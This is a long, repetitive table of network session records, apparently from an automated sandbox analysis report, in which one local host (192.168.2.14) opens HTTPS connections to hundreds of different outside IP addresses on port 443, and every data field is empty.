                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15419192.168.2.1445140181.52.68.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15420192.168.2.1450712158.135.92.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15421192.168.2.144140627.174.14.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15422192.168.2.1441434152.211.242.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15423192.168.2.1454418113.166.181.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15424192.168.2.1445010152.163.145.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15425192.168.2.143660838.204.34.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15426192.168.2.145582423.225.6.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15427192.168.2.1437842211.190.92.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15428192.168.2.1441778143.135.167.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15429192.168.2.1439448198.111.50.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15430192.168.2.1450228216.64.53.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15431192.168.2.143358688.5.244.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15432192.168.2.1441330123.96.70.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15433192.168.2.143476497.250.114.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15434192.168.2.145397236.207.144.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15435192.168.2.145235090.156.71.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15436192.168.2.1447934152.61.141.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15437192.168.2.144468863.159.240.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15438192.168.2.1444616223.118.242.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15439192.168.2.144271237.150.236.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15440192.168.2.1443860101.161.88.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15441192.168.2.1444652189.138.243.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15442192.168.2.14353889.27.172.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15443192.168.2.1449042152.167.160.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15444192.168.2.1450458212.246.255.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15445192.168.2.1442754130.241.64.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15446192.168.2.1449282221.246.67.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15447192.168.2.143335265.91.99.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15448192.168.2.1447146202.161.1.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15449192.168.2.144884473.47.198.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15450192.168.2.1458832129.176.177.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15451192.168.2.1434992143.60.253.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15452192.168.2.144403037.74.181.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15453192.168.2.144877647.254.130.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15454192.168.2.1439672208.205.173.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15455192.168.2.1436298154.27.226.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15456192.168.2.1456632118.214.186.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15457192.168.2.1448594199.88.15.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15458192.168.2.143640091.113.97.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15459192.168.2.1453612114.60.212.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15460192.168.2.144787858.212.72.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15461192.168.2.1443230152.12.89.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15462192.168.2.1437402132.225.150.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15463192.168.2.1457602130.171.247.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15464192.168.2.1456784164.24.196.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15465192.168.2.1460072170.194.150.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15466192.168.2.1435752205.1.131.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15467192.168.2.144911691.149.99.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15468192.168.2.1441038111.30.213.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15469192.168.2.1457854188.141.57.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15470192.168.2.14586142.220.36.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15471192.168.2.145538480.66.208.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15472192.168.2.145148467.83.26.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15473192.168.2.145607476.31.197.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15474192.168.2.1453462192.70.182.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15475192.168.2.1456136102.30.47.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15476192.168.2.1444934148.152.95.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15477192.168.2.1444346143.54.184.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15478192.168.2.144414485.67.176.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15479192.168.2.144784879.35.91.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15480192.168.2.145762057.231.205.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15481192.168.2.1439236184.249.158.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15482192.168.2.145828076.116.102.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15483192.168.2.1445810176.35.68.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15484192.168.2.145833025.218.167.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15485192.168.2.144729686.106.184.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15486192.168.2.1449028216.13.68.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15487192.168.2.1454680204.25.62.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15488192.168.2.1444496140.228.148.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15489192.168.2.143603213.38.185.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15490192.168.2.1445358222.124.15.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15491192.168.2.1453896147.242.210.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15492192.168.2.1447752133.233.137.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15493192.168.2.143295441.121.248.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15494192.168.2.144774253.7.188.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15495192.168.2.143595283.198.12.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15496192.168.2.1446326105.123.247.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15497192.168.2.144714218.138.115.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15498192.168.2.1450112180.62.182.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15499192.168.2.14386069.152.166.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15500192.168.2.1451984126.120.59.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15501192.168.2.1437334109.75.166.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15502192.168.2.1445276118.132.166.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15503192.168.2.1453806167.204.167.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15504192.168.2.1446672169.83.65.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15505192.168.2.1446908117.40.61.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15506192.168.2.144490686.211.91.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15507192.168.2.1456204133.83.141.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15508192.168.2.1458080130.118.12.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15509192.168.2.1459172136.175.22.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15510192.168.2.144414020.67.21.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15511192.168.2.1456064111.196.136.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15512192.168.2.144446887.64.38.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15513192.168.2.143999437.239.12.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15514192.168.2.1437544139.68.23.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15515192.168.2.1454670144.244.48.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15516192.168.2.144183492.191.236.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15517192.168.2.1454130204.178.185.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15518192.168.2.1460194219.198.189.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15519192.168.2.1460668161.241.87.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15520192.168.2.145596220.8.42.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15521192.168.2.1434978197.196.92.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15522192.168.2.1440978186.8.216.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15523192.168.2.144572088.82.77.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15524192.168.2.1457418158.216.176.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15525192.168.2.144555857.46.250.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15526192.168.2.1440096192.91.74.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15527192.168.2.1446114155.22.140.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15528192.168.2.1439918184.239.124.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15529192.168.2.1452178152.196.11.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15530192.168.2.1433872191.198.16.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15531192.168.2.1444292119.15.220.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15532192.168.2.143297685.230.244.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15533192.168.2.1458432107.166.212.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15534192.168.2.145372465.204.76.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15535192.168.2.1453920150.154.51.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15536192.168.2.143412863.4.13.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15537192.168.2.144030423.163.92.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15538192.168.2.145370648.164.175.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15539192.168.2.1438992104.34.17.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15540192.168.2.145147865.65.175.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15541192.168.2.145635234.98.246.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15542192.168.2.1447362162.176.113.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15543192.168.2.1447418199.165.213.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15544192.168.2.1450990208.159.142.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15545192.168.2.146006427.54.42.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15546192.168.2.1448358196.180.104.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15547192.168.2.145835212.120.64.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15548192.168.2.1458786115.174.137.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15549192.168.2.1448266197.216.82.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15550192.168.2.1450020118.147.202.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15551192.168.2.144788882.18.79.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15552192.168.2.1457390188.229.66.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15553192.168.2.145906071.17.18.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15554192.168.2.1451026119.170.31.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15555192.168.2.1452196216.119.45.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15556192.168.2.144396642.64.198.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15557192.168.2.1432796121.76.219.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15558192.168.2.144978282.61.231.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15559192.168.2.143438447.98.85.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15560192.168.2.145826062.88.67.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15561192.168.2.1448732115.236.147.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15562192.168.2.1454690137.84.48.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15563192.168.2.145286039.125.41.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15564192.168.2.144429290.2.166.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15565192.168.2.1443266208.27.190.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15566192.168.2.1435028183.80.234.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15567192.168.2.144744868.207.236.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15568192.168.2.1441966222.242.166.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15569192.168.2.1441990108.202.20.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15570192.168.2.1433074109.22.152.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15571192.168.2.144923494.115.74.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15572192.168.2.1434492117.75.165.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15573192.168.2.143949817.178.172.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15574192.168.2.1438798141.96.119.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15575192.168.2.1435936178.121.231.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15576192.168.2.1447940170.32.102.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15577192.168.2.1454150146.103.47.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15578192.168.2.1442266189.243.23.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15579192.168.2.143807072.173.215.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15580192.168.2.143435462.97.64.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15581192.168.2.1434940117.93.3.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15582192.168.2.1439740130.133.84.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15583192.168.2.1451128114.124.158.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15584192.168.2.145450240.106.185.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15585192.168.2.1444916120.87.123.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15586192.168.2.143291444.13.145.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15587192.168.2.144429868.171.222.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15588192.168.2.1439466175.40.7.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15589192.168.2.143912894.199.115.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15590192.168.2.145279296.101.175.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15591192.168.2.1446400164.42.144.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15592192.168.2.1443140128.182.200.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15593192.168.2.1453720102.176.55.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15594192.168.2.145287886.161.243.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15595192.168.2.1433952113.128.40.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15596192.168.2.145493664.241.113.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15597192.168.2.1445608173.30.106.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15598192.168.2.1432874168.152.124.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15599192.168.2.1458128159.122.86.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15600192.168.2.144938854.156.103.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15601192.168.2.1459454169.61.14.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15602192.168.2.1439632106.143.145.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15603192.168.2.1434838193.96.41.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15604192.168.2.145788693.105.249.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15605192.168.2.1439388221.162.69.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15606192.168.2.1457098100.53.85.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15607192.168.2.1441760206.153.169.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15608192.168.2.1456006143.235.10.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15609192.168.2.144978696.157.252.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15610192.168.2.145912696.209.103.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15611192.168.2.1433124108.123.140.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15612192.168.2.1438596211.172.38.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15613192.168.2.143516620.23.3.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15614192.168.2.1450800137.98.80.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15615192.168.2.1435930221.63.232.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15616192.168.2.1445910130.20.239.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15617192.168.2.1434688221.70.96.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15618192.168.2.143280246.199.173.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15619192.168.2.144082083.74.199.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15620192.168.2.1442436183.58.23.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15621192.168.2.143663843.27.124.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15622192.168.2.143716017.130.173.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15623192.168.2.146010694.14.90.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15624192.168.2.144427075.141.43.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15625192.168.2.1447172154.196.41.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15626192.168.2.144438494.6.29.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15627192.168.2.1450920121.28.43.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15628192.168.2.143937880.11.79.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15629192.168.2.1445668169.86.145.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15630192.168.2.1433532105.4.114.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15631192.168.2.145896492.27.202.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15632192.168.2.145940676.21.202.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15633192.168.2.144014860.26.82.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15634192.168.2.144900292.86.152.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15635192.168.2.1434890124.23.214.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15636192.168.2.1453146165.249.75.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15637192.168.2.1450118110.67.105.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15638192.168.2.1448530101.190.227.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15639192.168.2.1436234203.254.9.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
